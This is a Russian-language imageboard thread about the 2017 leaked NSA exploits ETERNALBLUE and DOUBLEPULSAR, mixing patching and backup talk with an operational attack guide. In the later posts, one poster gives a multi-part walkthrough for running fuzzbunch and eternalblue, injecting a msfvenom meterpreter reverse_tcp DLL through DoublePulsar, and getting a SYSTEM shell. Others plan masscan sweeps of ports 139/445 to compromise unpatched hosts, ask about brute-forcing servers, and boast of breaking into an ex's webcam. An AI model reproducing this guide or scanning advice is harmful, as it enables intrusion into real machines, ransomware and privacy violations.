Я его создавал, чтобы как можно больше народа, использующего такие схемы подключения оглянулись и почуяли огромный член, крадущийся к их жопе.
151218423
#153 #151218423
>>151218372
Ну попиздят у них данных, ниче страшного, сто раз уж пиздили.
151218629
#154 #151218443
>>151218370
Режь вообще все incoming, ибо нехуй.

Открой только несколько случайных портов >32000 - будешь через них торренты/FTP гонять.

И UPnP тоже нахуй сразу
#155 #151218454
>>151218370

>137-139, 445


Ох блядь, сколько еще дыр найдут в SMB, я еще msblast помню, а до него этот, забыл как называется, для винды 95-98.
151218487151218518
#156 #151218474
Кому вы нахуй нужны ?..........
151218486
#157 #151218486
>>151218474
ботнетам
#158 #151218487
>>151218454
В редмонде старая школа, дыр на века вперед встроила.
#159 #151218518
>>151218454
Так оно для интернета и не предназначено, только для корпоративной сети с казенными компами.

Еще можно о несекурности telnet'а поплакать и дыры в rsh поискать.
#160 #151218629
>>151218370
На роутере? Снаружи, из интернета - да.

Но тут момент - если у тебя в локалке домашней расшарены папки, то может прилететь с соседнего компа.
Если включен upnp - тоже есть шанс, что какой-нибудь крек от васяна откроет.
Так то по сути вернулись во времена RPC DCOM эксплойтов, когда эникеи носились от компа к компу в локалке мелких контор.
Сейчас грядет повторение.

>>151218423
Некоторые делают для удобства себе дырку на рабочий сервак. Сотрудникам поработать удаленно, самому залезть и поправить что-то из дома. Таких наивных много.
А на серваке бухгалтерия, всякая такая параша - пиздык, и админко вешается на куске патчкорда. Большие объемы данных затрахаешься бекапить, к тому же, в мелкоконторах на ручках экономят, не то, что на NAS для бекапов.
#161 #151218713
>>151218629
Ну если автобэкап не настроили, то нахуй таких админов. Поувольняют, может научятся бэкапы ставить.
151219001
#162 #151218727
>>151218629
Откуда в мелкоконторе большие объемы, там покупается юсб хард на терабайт и туда все бэкапится. Хард лежит в сейфе и выдается админу для бэкапа раз в неделю.
151218758151219001
#163 #151218758
>>151218727

>Хард лежит в сейфе и выдается админу для бэкапа раз в неделю.


Проиграл с этого хайтек решения
#164 #151218776
>>151218629
Скрипт пишется, который дампает БД регулярно, и кладет на ФТП или NAS, как нехуй делать. Если не осилили, то сами виноваты, это даже студент осилит.
151218791
#165 #151218778
>>151218758
Ну предложи что-то сопоставимое по стоимости.
#166 #151218791
>>151218776

>кладет на ФТП или NAS


Где этот фтп и где этот NAS?
151218806
#167 #151218806
>>151218791
Под столом стоит.
151218846
#168 #151218846
>>151218806
Откуда он там возьмется?
151218859
#169 #151218852
>>151218758
Эйргэп по-русски. Алсо, обнаружил, что Касперский изначально рубит соединения по 3389. ФСБ обо мне заботится?
151218902
#170 #151218859
>>151218846
Соберут из старого говна с помоек.
151218913
#171 #151218902
>>151218852
Касперский дохуя чего рубит. Скажем, он пихает свой https сертификат, чтобы трафик сканить.
151218966
#172 #151218913
>>151218859
Кек, так обычно и бывает. У нас в конторе какой-то древний комп под бэкапы юзали, который хз кто из дому притащил. Жесткие диски просто в него тыкали.
151218953151218955
#173 #151218953
>>151218913
Такие конторы просто обязаны однажды попасть под вирусняк/эксплоит, который к хуям уебет данные. Только так начальники поймут, что бабло надо тратить не только на свои мерседесы.
#174 #151218955
>>151218913
Ну хоть бэкапы были, в половине контор и этого нет.
#175 #151218966
>>151218902
Это получается из-за Касперского у меня пинг с серваками еа 100?
151218984151218998
#176 #151218984
>>151218966
Очень может быть. Отруби его и проверь.
#177 #151218998
>>151218966
Угу, в кваку по сети играешь, а касперский твои ракеты на лету сканит.
151219027151219132
#178 #151219001
Snowden:"This is not a drill: #NSA exploits affecting many fully-patched Windows systems have been released to the wild. NSA did not warn Microsoft.

>>151218713

>Ну если автобэкап не настроили, то нахуй таких админов.


Василь семеныч, нам нас нужен для бекапов. Каждый день бухгалтерию и все эти писульки, что менеджеры настрочили.
Нужно 20к на диски. Как нахуй?
Что, изыскать свободные средства? Окай.джпг

>>151218727

>Откуда в мелкоконторе большие объемы


База 1с десяток гигов, доки всякие инкрементально, пару ответственных машинок с ключами/криптопро/випнетами/говном_всяким - целиком образами, ибо затрахаешься если что восстанавливать.
Так-то немало для регулярных бекапов.

>Хард лежит в сейфе и выдается админу для бэкапа раз в неделю.


И именно в тот момент, вечером, пока на него сливается все, наработанное за неделю в порт кто-то негромко стучится...

>Скрипт пишется, который дампает БД регулярно, и кладет на ФТП или NAS, как нехуй делать.


Который собран из говна десятилетней выдержки?

Суть-то в том, что так или иначе у админов (эникеев, побегаек, как ни назови) все равно резко прибавится работы и проблем.
151219164
#179 #151219027
>>151218998
Надо им написать, чтоб курс ракет на правильный подправляли.
#180 #151219031
>>151218758
В моей прошлой конторе я делал бэкапы трижды. Один раз на NAS в соседнем офисе, зареганном на другую контору, второй раз просто на юсб хард постоянно подключенный к серверу, и третий раз на юсб хард, который начальник хранил в банковской ячейке (sic!)
151219083
#181 #151219064
Так, поясните нормальному человеку шо мне надо нашаманить в роутере шоб ко мне не добрались хацкеры и не сломали систему.
314 Кб, 720x1280
#182 #151219069
>>151185399
Оп, ты че лахаешь что ли?
151219154151225162
#183 #151219083
>>151219031
Ну в банковской ячейке есть смысл, если какие-то совсем неизменяемые данные, типа ключей.
24 Кб, 500x281
#184 #151219127
За корпоративные бекапы обсудили. С личными как быть? К примеру нужны шифрованные бекапы папок с личного пк и ssh, rdp серверов
151219180151219209
#185 #151219132
>>151218998
Не, тупо стоишь и не жмутся кнопки.
#186 #151219154
>>151219069

>In computing, the network protocol Server Message Block version 3

151219285
#187 #151219164
>>151219001

>так или иначе у админов (эникеев, побегаек, как ни назови) все равно резко прибавится работы и проблем


У нормальных админов винды обновляются и не торчат голым RDP в интернет.
151219240
#188 #151219180
>>151219127
А в чем разница? Ставишь тот же NAS и делаешь.
#189 #151219209
>>151219127
На личном mail.ru cloud же ставишь, и все туда бэкапится.
#190 #151219240
>>151219164
Еще раз, тред адресован всем, и нормальным, и ненормальным, и не админам совсем, кто открыл у себя порт рдп по гайду, чтобы из любого места на домашний комп заходить.
Кто-то прочитает и скажет - ну, я так никогда не делаю. Ок, молодец.
А кто-то уже сейчас рвет на жопке волосы и пытается вспомнить, когда он в последний раз делал бекап.
151219410
#191 #151219247
>>151219209
Анб через rdp почитают, фсб через mail.ru cloud. Все довольны.
#192 #151219259
>>151219209

>На личном mail.ru cloud же ставишь, и все туда бэкапится.


Чем? не руками же
151219277
#193 #151219277
>>151219259
Там прога ж, которая сама бэкапит.
151219291
#194 #151219285
>>151219154
Мне гугол врет?
151219399
#195 #151219291
>>151219277
Софт от маил.сру использовать? нахуй
#196 #151219303
>>151219209

>На личном mail.ru cloud же ставишь, и все туда бэкапится.


В том числе и свежезашифрованны файлы. Облако-то синхронизируется с твоей базовой папкой, что там лежит, то и в облаке будет.

К тому же майлру - ну как-то я даже не знаю, или ты заранее все к досмотру предъявляешь?
#197 #151219364
>>151218055
Не сервер с тротилом, а контейнер самоуничтожающийся.
Хотя он не прав, левый хуй может зайти, и науничтожать к хуям всё
278 Кб, 720x1280
#198 #151219399
>>151219285
Нет, твои глаза.
6 Кб, 456x79
#199 #151219408
Посоны, как вывести грепом найденну. Строку + 4 строки вверх?
151219464
#200 #151219410
>>151219240

>кто открыл у себя порт рдп по гайду


Я этого не делал, у меня стоит тупо спермерка. Мне есть чего бояться?
#201 #151219464
>>151219408
ключ B вроде
151219586
#202 #151219586
>>151219464
Ага, спасибо.
#203 #151219711
Бля, унылей занятия чем эти ваши сети с кулхацкингом не найти.
151219760
#204 #151219760
>>151219711
Ты вош догс не играл что ли?
151219892
#205 #151219892
>>151219760
Это типа симулятор мытья собак?
151219967151219987
205 Кб, 400x368
#206 #151219967
>>151219892
Проиграл
#207 #151219987
>>151219892
Симулятор собак со вшами.
#208 #151220077
>>151184817 (OP)
Там зеродей хоть один был?
151220517
#209 #151220284
>>151184817 (OP)
Если на ip моего провайдера, через который я хожу в интернеты открыт 445 порт?
#210 #151220376
Где блядь сорцы сплоитов? На гитхабе уже скомпилированные файлы.
151220451
#211 #151220451
>>151220376
Сырцы не слиты.
151220462
#212 #151220462
>>151220451
Ахуенно. Ну ладно, буду реверсить ESTEEMAUDIT
#213 #151220517
>>151220077
CONFIRMED — ETERNALBLUE is a #0day RCE exploit that affects latest & updated Windows 2008 R2 SERVER VIA SMB and NBT!

https://twitter.com/hackerfantastic/status/852902728892375042
#214 #151220713
>>151220613
Кидай свой IP - просканю порты тебе.
#215 #151220799
>>151220750
Внешний же. Если ты за роутером не в режиме DMZ - то опасаться нужно только внутренних угроз+уязвимостей роутера(не врубать работу его вёб-морды в WAN как минимум)
#216 #151220842
>>151220613
Уязвима не только RDP, но и самба. И вообще - обновиться не проще?
151220932
#217 #151220847
проиграл в голос с опа долбаеба который даже не удосужился описание почитать
рдп эксплоит работает только для икспи и 2003 это старое говно и так ебут все кому не лень.
#218 #151220877
>>151220847
Самба уязвимость на всех виндах, акромя десятки(хотя некоторые источники пишут, что и 10 уязвима)
151220931
#219 #151220931
>>151220877
и много ты самбы жопой в инет видел лалка?
Большая часть спрятана за натом и порт специально пробрасывать никто не будет
Те немногие с дайрект айпи скорее всего заблокируются фаерволом. Алсо уже все топ антивирусы детектят это говно.
В общем оп треда обычный студент который вдруг ощутил ПРИЧАСТНОСТЬ к хакирам.
Сажа скрыл.
151221131151221462
#220 #151220932
>>151220842
Падажжи, если я с компа по smb расшарил папку на другое устройство, я уязвим?
151220961
#221 #151220961
>>151220932
если ты дайрект ип имеешьчто сильно врядли. или ты специально форвардил порт за нат.
#223 #151221058
>>151220847
тоже поржал с долбаебов.
300 постов дауны трут о том как страшно жить при этом никто даже описание не прочитал.
Походу оп начинающий провинциальный админ судя по стилю постов.
#224 #151221104
>>151221056
И?
Там стоит галочка напротив икспи и 2003.
Хуле ты это постишь, я про это и написал. Ты умственно отсталый?
151221197
#225 #151221131
>>151220931
А зачем тебе жопой в инет?
Тебе хватит троянчика, запущенного секретаршей в твоей конторе. PEEZDARIQUE всему.

>Алсо уже все топ антивирусы детектят это говно.


Ты не понимаешь момента - конкретные тулзы - да, детектятся, но важен-то способ. Через неделю появятся новые, еше не детектящиеся.
Кроме того, это захватит огромный парк машин, на которых стоит по каким-то причинам необновляемая система. А таких во внутренних сетях предприятий достаточно.
151221233151221321
#226 #151221172
>>151184817 (OP)
Какой питон нужон для энтого фрейсворка?
#227 #151221184
>>151184817 (OP)
Добра тебе, анон.
#228 #151221197
>>151221104

>Хуле ты это постишь, я про это и написал. Ты умственно отсталый?



Нет ты.

Посмотри новости, уже все выяснили, что работает и на других версиях.
151221274
#229 #151221233
>>151221131
Кончай нести ахинею.
Секретарша и так запустит любое говно.
И так полно сплоитов типа потато которые отлично работают на необновленных системах.
В чем суть твоего мессаджа не ясно. Но видно что тебе очень хочется казаться умным.
Продолжай расказывать как 2008 сервер овнит сплоит для 2003.
Сажа.
151221368151221810
#230 #151221274
>>151221197
кек.
Ну лан.
А мы то с мужиками и не знаем.
Ты сам то проверял? Или только репостить всякую хуйню можешь?
151221368
#231 #151221293
>>151184817 (OP)
Кстати зачем ты на github кидаешь, там уже рапакованные и перезалитые.
Стопудов наприклеивали хуйни своей
151221339151221447
31 Кб, 400x400
#232 #151221321
>>151221131

>Тебе хватит троянчика, запущенного секретаршей в твоей конторе


Причем тут тогда опубликованные сплоиты?
151221447
#233 #151221323
Блять я еблан в скрипте же написано 2.6 ))
#234 #151221339
>>151221293
просто он вонаби мамкин хакир. Это же круто с умным видом произносить всякие технические термины.
151221447
#235 #151221368
>>151221233

>В чем суть твоего мессаджа не ясно.



Еще раз. В сети уже полно случаев, когда ломали сервера с единственным открытым рдп портом.
Единственная моя цель - предупредить анона, который еще не в курсе ситуации.

>Продолжай расказывать как 2008 сервер овнит сплоит для 2003.


Да мне похрен на тебя. Считаешь себя самым умным - ок, я не против.

>>151221274
Да. Работает. Развернул из бекапа свою ту виртуалку и грохнул ее уже сам. 2008r2, обновления ставил месяц назад, до глобальных патчей.
Больше времени разбираться не было.

Мне без разницы, веришь ты или нет, мое дело предупредить тех, кому это может навредить.
151221444
#236 #151221385
Спрошу тут, может ответят..
Собрался ставить шиндвс10, оно мне Биос не испортит?
Слухи вроде нехорошие ходят Чет я очкую
151221570
#237 #151221412
Нахуя это? Обычных пользователей стационарного пека не затронет же.
#238 #151221444
>>151221368
Спасибо анон, ты очень добрый хакер, боженька тебя за это вознаградит, на небе
А на самом деле ненужно кричать о таких вещах, я щитаю.
Нужно дать рибитишкам вдоволь порезвится
#239 #151221447
>>151221293

Подразумеваю, что у тебя уже есть скачанные год назад архивы.
Если что - ссылки все есть в статьях, все в открытом доступе, бери да проверяй сам.

>>151221339
Ок, почитай, что с умным видом произносят буржуи, если тебя как-то задевают мои посты.

>>151221321
Притом.

https://www.youtube.com/watch?v=n_MmgtzUUAw
151221479151221589
274 Кб, 1920x1055
#240 #151221462
>>151220931

>и много ты самбы жопой в инет видел лалка?


У меня в мухосранске один единственный(номинально есть ещё 1, но на нём 0.01% сидят) провайдер. Он ВСЕМ клиентам предоставляет белый, хоть и динамический(после реконнекта PPPoE) IP. Да, дома у многих стоят wi-fi роутеры, но не у всех же. Просканил сейчас 255 адресов провайдера - 4 самба порта торчит наружу. А сколько всего у провайдера клиентов, как думаешь?
Кто теперь лалка?
>>151220888

>Иди нахуй шиндоусебан


Нет ты.

>Уже 4 года не ставил не одной обновы на свою 7.


Ну ты и балбес.
151221502
#241 #151221479
>>151221447
и? в твоем видео овнят виртуалку смб эксплоитом.
Причем тут РДП?
151221497
#242 #151221497
>>151221479
Я отвечал на пост другого анона, про секретаршу и внутреннюю сеть предприятия или конторы например.
Сервак с файловой шарой, ага?
#243 #151221502
>>151221462
походу ты совсем в деревне живешь. Даже в пгт у моей бабки поголовно у всех тплинки стоят.
151221519
#244 #151221519
>>151221502
Это те, которые с бекдором в прошивке?
151221543151221566
#245 #151221543
>>151221519
это те с паролем админ
пиздец я с вас в голос ржу. Типа открыли америку интернет в опасности. ЖЖ артемия лебедева уже нашли?
151221559
#246 #151221559
>>151221543

Так я про те дырки из 2013 года.

https://sekurak.pl/tp-link-httptftp-backdoor/
#247 #151221566
>>151221519
Кстати да, не стоит списывать со счетов уязвимости в древних тплинках+дефолтные или очень простые пароли+возможно включенный wps. Всякие хакиры довольно быстро напишут бота, который всё это автоматом будет чекать и попадая в роутер пробрасывать самба порт наружу.
#248 #151221570
>>151221385
Бамп вопросу, чет сыкотно за Бивис
Идентификаторы мб какие туда пишутся? м?
151221596
#249 #151221589
>>151221447
Стим не умеет брутить, значить в топку
#250 #151221596
>>151221570
пропишут в биос смб порт тебе а потом тебе подросят криптолокера.
151221632
78 Кб, 960x540
#251 #151221632
>>151221596

>пропишут в биос смб порт

#252 #151221706
Поясните пожалуйста, что делать коммон юзеру, который ни слова не понял из ОП поста. Серверов не имеющий, ничего важного не хранящего.
#253 #151221736
>>151221706
Пользоваться windows update.
#254 #151221747
>>151221706
Расслабиться.
И не забывать обновляться и бекапить важные вещи.
#255 #151221752
>>151221706
нужно в биосе закрыть сб и рдп порт.
151221784
#256 #151221784
>>151221752
Анус себе в биосе закрой, толстота.
#257 #151221810
>>151221233
А где сажа, тупень?
#258 #151221897
>>151184817 (OP)

>скорее беги ставить патчи от Microsoft


Ссылку на патчи. БЫСТРАБЛЯДЬ!!!!!!1101
sage #259 #151221906
Мам, я какир)) Ну мааам
#260 #151221913
>>151184817 (OP)
Я рядовой юзер винды, чем мне будет угрожать вышеописанная ХУNТА?
Что со мной могут сделать "хакнув"?
151221932151221963
#261 #151221932
>>151221913
шифранут твои файлы
#262 #151221963
>>151221913
Если хакнут - всё, что угодно. Хоть файлы удалять, хоть вёбкамерой подсматривать как ты письку трёшь. Но более вероятный вариант, что весь твой винт зашифруют и предложат заплатить денег за расшифровку.

ДЛЯ ТЕХ КТО НЕ ПОНЯЛ - ПРОСТО ОБНОВИТЕ СВОЙ ШИНДОУС И НЕ ПАРЬТЕСЬ
151222126
#263 #151222126
>>151221963
Я все понял, порекомендуй каких нибудь криптолокеров годных
#264 #151223682
bump
690 Кб, 1916x976
#265 #151223809
Вот как-то так оно выглядит. Ман по установке/настройке накидать?
151223867151226202
#266 #151223867
>>151223809
Давай, тоже потестить хочу. Сперва расскажи, как джве виндовых виртуалки между собой в сеть законнектить для тестов?
151224042151224289
#267 #151224042
>>151223867
Часть 1.
На атакующую виртуалку накатываешь XP/7 x86 (именно x86, не 64). Ставишь питухон 2.6.6 (https://www.python.org/ftp/python/2.6.6/python-2.6.6.msi) и pywin32 (https://sourceforge.net/projects/pywin32/files/pywin32/Build 219/pywin32-219.win32-py2.6.exe/download), опционально - ConEmu. После установки качай архив с гитхаба (https://github.com/DonnchaC/shadowbrokers-exploits/archive/master.zip), распаковывай папку windows куда-нибудь (c:\nsa\, например)
#268 #151224077
>>151224042

>На атакующую виртуалку накатываешь XP/7 x86 (именно x86, не 64).


А потом ты её тащишь в сеть и её анально насилуют.
151224089151224101
sage #269 #151224086
БЛЯЯЯЯ, ну сука. Придётся заняться теперь диким пердолингом. У меня к серваку был рдп настроен свой порт. В роутере был дмз настроен. Ну бля теперь всё перенастраивать придётся. Или может забью ибо всё равно хотел железо менять
#270 #151224089
>>151224077
Да вот не похуй - пусть насилуют в виртуалке.
#271 #151224101
>>151224077
Не обязательно тащить её в сеть. Я между двумя виртуалками тестил, брат жив.
#272 #151224191
>>151224042
Ты долго здесь будешь? Накатываю win7x64 в качестве атакуемой, после еще поставить x86 - минут 30 уйдет на всё это.
151224321
#273 #151224289
>>151223867
>>151224042
Часть 2.
Создаешь в корне диска C: папку logs. Открываешь консоль, переходишь в папку с fb.py (c:\nsa\), запускаешь: python fb.py и смотришь, какую ошибку напишет (а напишет он, что не найдена папка бла-бла-бла). Из текста ошибки дёргаешь название папки, создаёшь её в c:\nsa\. Всё, you are ready to rock.
#274 #151224320
>>151224289

>Поставь винду и питон


>Запусти скриптик


Взлом уровня /b
151224342
#275 #151224321
>>151224191
Еще с полчаса-час точно буду. Единственный момент - писать буду по памяти, потому что тестовых виртуалок сейчас нет под рукой.
151224644
#276 #151224342
>>151224320
Взлом уровня N S A
#277 #151224449
>>151224042
>>151224289
Спасибо, а то в твитере одни демонстрэйшон
#278 #151224496
>>151224289
Часть 3, самое интересное.
Создаешь новый проджект в fuzzbunch. Забиваешь IP'шники (первый - жертва, второй - твой), Use redirection - n (или no, хуй проссышь как оно вообще работает). Запускаешь smbtouch (use smbtouch), оно будет спрашивать всякое, просто соглашайся (в тепличных условиях нормально работает, на "живых" машинах могут возникнуть небольшие затруднения). Ждёшь пока отработает и смотришь, каким сплоитом можно пробить тачку (для 7 32/64 и 2k8 обычно eternalblue).
151224621151224625
#279 #151224518
А если RDP открыт только внутри сети?
#280 #151224621
>>151224496
Часть 3, продолжение.
Если советует юзать eternalblue - юзай его, если советует eternalromance или eternalchampion - юзай eternalromance (проще в настройке). Прописываешь use eternalblue, опять начнутся вопросы, обрати внимание на тип payload'а (FB/DANE) - нам нужен FB, сервис (SMB, 445) и архитектуру атакуемой системы (smbtouch вроде пишет при сканировании). Заполняешь, спросит про плагины - y, ждёшь. Если будет написано =======WIN=======, то значит на атакуемой машине заработал doublepulsar (NSA'шный бэкдор).
151224935
#281 #151224625
>>151224496
Вангую в вебаче сегодня-же появятся треды по масс-чекингу, аля берем диапазоны отсюда, чекаем массканом 139, 445 и ебошим этерналблюем
151224640
#282 #151224640
>>151224625
Да я уже сам думаю масс-сканилку с гуём накидать, лол
#283 #151224644
>>151224321
Ставлю вторую (x86). Распиши пока как и в виртуалбоксе в одну сетку загнать?
151224746
34 Кб, 731x437
#284 #151224746
>>151224644
В обоих виртуалках в настройках адаптера выстави тип подключения - "Внутренняя сеть" и какое-нибудь одинаковое имя. После установки систем назначь IP'шники машинам (10.0.0.1/255.255.255.0 на первой и 10.0.0.2/шлюз 10.0.0.1/255.255.255.0 на второй)
151226233
#285 #151224851
>>151221706
Фаервол установи. Хакиры пососут.
#286 #151224935
>>151224621
Часть 4.
Так, теперь самое главное. Нужна тачка с metasploit framework. Версия не суть важна, но лучше, конечно, что-нибудь относительно свежее. Для начала соберём DLL, которую будем скармливать DoublePulsar'у. Если атакуемая тачка на x32(x86), то пишем: msfvenom -p windows/meterpreter/reverse_tcp LHOST="IP хоста с metasploit (без кавычек)" LPORT=1338 -f dll > meter32.dll. В рабочей директории появится meter32.dll, перекидываем её в C:\nsa на атакующем хосте. Поднимаем хэндлер, для этого:
1) Запускаем сам MSF - msfconsole
2) После запуска - use multi/handler
3) set payload windows/meterpreter/reverse_tcp
4) set lhost 0.0.0.0
5) set lport 1338
6) exploit -j
После этого хэндлер запустится в фоновом режиме (посмотреть, работает ли он, можно с помощью команды jobs в консоли metasploit)
#287 #151224992
>>151224935
Метасплоит хер зарегаешь - ещё и кали накатывать виртуалкой или может есть где-то под винду уже спёртый?
151225090
#288 #151225051
ЭКСПОЛОЙТЫ БОЛЕЕ НЕ ПРЕДСТАВЛЯЮТ ОПАСНОСТИ И НЕ ПРЕДСТАВЛЯЛИ ПОСЛЕ 2013 ГОДА, ШКОЛОТА КАК ОБЫЧНО ПУКНУЛА СЕБЕ В ЛИЦО

-Крыса-кун
151225089
#289 #151225089
>>151225051
Я такой капсболд каждые пол года читаю начиная с 2001 года.
#290 #151225090
>>151224935
Часть 5, почти финал.
В консоли fuzzbunch пишем use doublepulsar, снова начнутся вопросы. Архитектура - такая же, как и на атакуемой машине, дальше спросит про Function - выбираем номер с RunDLL. Спросит про путь до DLL - вводим путь до собранной DLL с meterpreter'ом (c:\nsa\meter32.dll). Прожимаем энтер на всё остальное и ждём. Если всё нормально, то в консоли metasploit появится инфа по отправке стэйджа meterpreter, после чего откроется новая сессия.
>>151224992
Под винду спёртого вроде нет, проще кали накатить.
151225119
#291 #151225100
>>151184817 (OP)
Аноны, где брать новые диапазоны для брута дедиков?
151225209151225300
#292 #151225119
>>151225090
А, и да, когда будет спрашивать про Ordinal, вместо 1 нужно выставить 5
151225205
sage #293 #151225162
>>151219069
Меня всегда удивляло это хохло-слово...
#294 #151225205
>>151225119
Часть 6. NoFun
Прибиваем doublepulsar (use doublepulsar, дальше всё как в 5 части за исключением функции - выбираем Uninstall) и радуемся meterpreter'у с правами NT Authority\SYSTEM. Что делать дальше - уже на своё усмотрение.
#295 #151225209
>>151225100
На дваче, очевидно же.
151225271
#296 #151225217
>>151224935
Спасибо тебе аноньчик, все развернуто и понятно.
Я так понял отработает doublepulsar и зальет нашу dll'ку затем откроется сессия в метерпретер, собственно обязательно дллку или можно exe заливать?
151225300
#297 #151225271
>>151225209
Я серьезно.
#298 #151225300
>>151225100
bgp.he.net
>>151225217
DLL онли, Raw Shellcode роняет систему. Если сессия не появится, а doublepulsar будет писать, что бэкдор отработал - попробуй заново запустить doublepulsar (смотри ч.5)
151225458151225523
#299 #151225447
Спасает ли виндозовский фаервол с ограничением доступа по ип к рдп порту?
151225513
#300 #151225458
>>151225300
Ясненько, слава богу что ты есть, на днях еще такой в твитере сижу репостчю этого хакерфантастик, думаю будет настроение над попробовать, а тут и ты подоспел с гайдом.
Сам вряд-ли бы разобрался, вначале думал там в самом fb.py сессия открывается
151225513151225592
#301 #151225513
>>151225447
Если SMB/NBT не заблочены, то нет
>>151225458
А сессия и в fb.py открывается (можешь глянуть - пропиши session после того как eternalblue отработает)
#302 #151225523
>>151225300
Спасибо.
#303 #151225592
>>151225458
Вообще, это вин уровня MS08-067, а может даже выше, но я не планирую масс-сканом заниматься (во всяком случае не сейчас)
151225675
#304 #151225650
>>151224935
Алсо, быстрофикс вот сюда. Если же атакуемая ось x64, то после windows добавляется /x64/ (и в msfvenom, и в multi/handler). Т.е. должно получиться так: windows/x64/meterpreter/reverse_tcp
#305 #151225675
>>151225592
Кстати можно до сих пор находить такие, встречаются под MS08-067 их мало, но есть.

Еще небольшая заметочка может кому тоже пригодится: masscan в 139, 445 не умеет, не знаю почему но конкретно их точно не ищет, их можно искать тупо сканируя 3389, т.к на дедиках они как правило в пачке присутствуют, а затем уже по этому списку пройтись nmap'ом если нужен именно 445.
151225749
#306 #151225688
Взломал комп бывшей. Теперь смогу наконец смотреть её вебкамеру lkdsgnafaba'vbak'ergjaer[gwjeriglkfdvnkjlds vsdf.sd sg, sg sgbsrgtrtbrtbrtbrtrtttttttttttttttttttttttttttttttttttttt
#307 #151225749
>>151225675
Так можно и своими силами сканить. Обновившихся, на вскидку, процентов 15-20. Можно просто ломать всё (почти всё), что торчит наружу 137/139/445 портом.
#308 #151225773
8.1 с последними апдейтами ебут?
151225783151225833
#309 #151225783
>>151225773
проф версия
#310 #151225833
>>151225773
Не тестил 8/8.1. Апдейт MS17-010 вышел 14 марта, если обновлялся недавно, то очевидно что нет.
#311 #151225915
Да кто блядь включает этот сраный рдп, да еще и порты пробрасывает через роутеры наружу? есть такие ебонутые? слышал только, что дебики так 1С юзают, ну что взять с говноедов.
#312 #151225957
>>151225915
Поверь, таких дебиков предостаточно, и не только в роиссе. Более того, они еще и автоапдейты вырубают.
151226054
#313 #151226054
>>151225957

>еще и автоапдейты вырубают


Учитывая как это говно работает в винде, ничего удивительного.
151226247
#314 #151226063
>>151225915

>слышал только, что дебики так 1С юзают, ну что взять с говноедов


Щито поделать, когда другие дебики не выделяют денег на сервер виртуализации\1с сурв, а сами гоняют на майбахах
151226110
#315 #151226093
>>151225915
а как выключить рдп?
151226110
#316 #151226110
>>151226063
Не повод по полной забивать на безопасность
>>151226093
Дунно, спроси у гугла
#317 #151226125
>>151225915
Большинство думает шаблоном "НУ ВЕДЬ У МЕНЯ ФАИРВОЛ И АНТИВИРУС. А ЕЩЁ ПОЛИТИКИ. ХАКИРЫ САСАЙТИ!"
#318 #151226202
Такс, свои ответы можете задать здесь: зерочан/i/5324, вечером буду.
>>151223809-кун
151226224151226246
#319 #151226224
>>151226202
Почему не двощ? Потому что макак-пидор снёс /i/ года 3 назад (если не больше)
1261 Кб, 3286x1080
12 Кб, 637x183
#320 #151226233
>>151224746
Слева - атакующая, справа - жертва.
В обоих вариантах стоит "внутренняя сеть"
ЧЯДНТ?
151226255151226276
#321 #151226246
>>151226202
Обнял, на созвоне :3
151226399
#322 #151226247
>>151226054
Как работает? Ставится в фоне, инсталится при выключении, ещё и спрашивает как хочешь поставить и хочешь ли ты ставить обновления качая с мобильного инета. Если ты не деб который на Семёрке в 2к17 году конечно же.
151226570
#323 #151226255
>>151226233
А, блядь, просто Брэндмауэр шиндоус пинг по дефолту фильтрует. Всё норм.
151226276
#324 #151226276
>>151226233
>>151226255
Он не только пинги фильтрует, как вариант - выруби его
#325 #151226392
О, ебать. Черношляпники подъехали.

ВСТУПАЙТЕ И КОМПИЛИРУЙТЕ
#326 #151226399
>>151226246
Будь няшей, напиши там в треде что-нибудь NULLчан.hk, господи, я хуй знает как еще написать
151226605
#327 #151226454
>>151184817 (OP)
Помню какой-то хацкер пробрался в мой ровутер через DynDNS, переименовал точку доступа в PWNEDBy2ch и пароль в SmeniParol.
Это я потом понял что у меня DynDNS и пароль стандартный был, но когда я обнаружил ВТОРЖЕНИЕ я знатно очканул.
#328 #151226570
>>151226247
Работает как говно, апдейты по часу накатывает, будто блядь там вся винда переустанавливается, хранит гигабайты говна после апденйтов.
151226771151227233
#329 #151226605
>>151226399
Я уж грешным делом пошел на анимешный зерочан регаться,
оказывается все куда проще
#330 #151226753
>>151184817 (OP)
Спасибо няш
#331 #151226771
>>151226570
Чо за хуйню поришь? Если на пустую то да, первое обновление долгое, а потом все быстро, пара минут.
473 Кб, 1135x989
#332 #151226880
Лол, действительно работает. Вечером виртуалочку с кали накачу, для завершения проверки.
151226956
#333 #151226956
>>151226880
Совет - накати ConEmu, не мучайся с консолью
#334 #151227233
>>151226570
Подозреваю, что ты про голую win7 SP1? Давно уже есть решение(пишу для x64):
1)Голая семерка, вырубаешь СРАЗУ проверку обновлений до втыкания кабеля.
2)Вставляешь кабель, качаешь KB3172605-x64 и KB3020369-x64. Ставишь.
3)Качаешь kb3125574 (это по сути SP2 для семерки), ставишь.
4)Врубаешь обновления и докачиваешь без гемора последние апдейты.
Ссылка по теме:
https://habrahabr.ru/company/eset/blog/301080/
151227335
#335 #151227335
>>151227233
Ну и дрочево
151227416
#336 #151227416
>>151227335
Это один раз сделать и потом спокойно можно оставишь автоматические апдейты. Я столько раз семерку ставил и прекрасно знаю, что если просто win7 сп1 попросить обновиться вин-апдейтом - 2 часа поиска обновлений, 2 часа установки, все апдейты с первого раза скорее всего не встанут -> после ребута снова 2 часа поиска и еще час установка. Так что это "дрочево" самый лучший вариант накатывания семерки.
#337 #151227580
>>151184817 (OP)
Что это вообще за йоба? У меня комп сломается?
мимо нихуя не понявший юзер
151227605
#338 #151227605
>>151227580
Сидишь за роутером и обновляешь винду? Тогда нет.
151227714151227791
#339 #151227637
>>151184817 (OP)
как это всё юзать?
151227709151227876
#340 #151227709
>>151227637
Тред почитай. Тут уже целый гайд написали.
#341 #151227714
>>151227605
Сижу за роутером, не обновляю (стоит восьмерка). Мне пизда?
под обновление я ведь правильно понял обновление до более новой винды? (Да, я тупой)
151227815151227920
#342 #151227743
>>151184817 (OP)

> или закрывать порт


> или закрывать порт.


Тред не читал.
Ебанаты, не умеющие менять номера дефолтных портов, а также ограничивать доступ на маршрутизаторе извне, должны страдать.
151227858
#343 #151227791
>>151227605
А разве еще и рдп включен по дефолту? челиков с включенным рдп еще нужно попробовать найти.
#344 #151227815
>>151227714
Не, обычные обновления для винды, на KB/MS начинаются. Накати вот это - https://www.microsoft.com/en-us/download/details.aspx?id=50027, чтобы быть спокойным
151227848
#345 #151227848
>>151227815
Спасибо, анон
Так вот что это за обновления системы по вечерам не дают пеку вырубить
#346 #151227858
>>151227743

>менять номера дефолтных портов


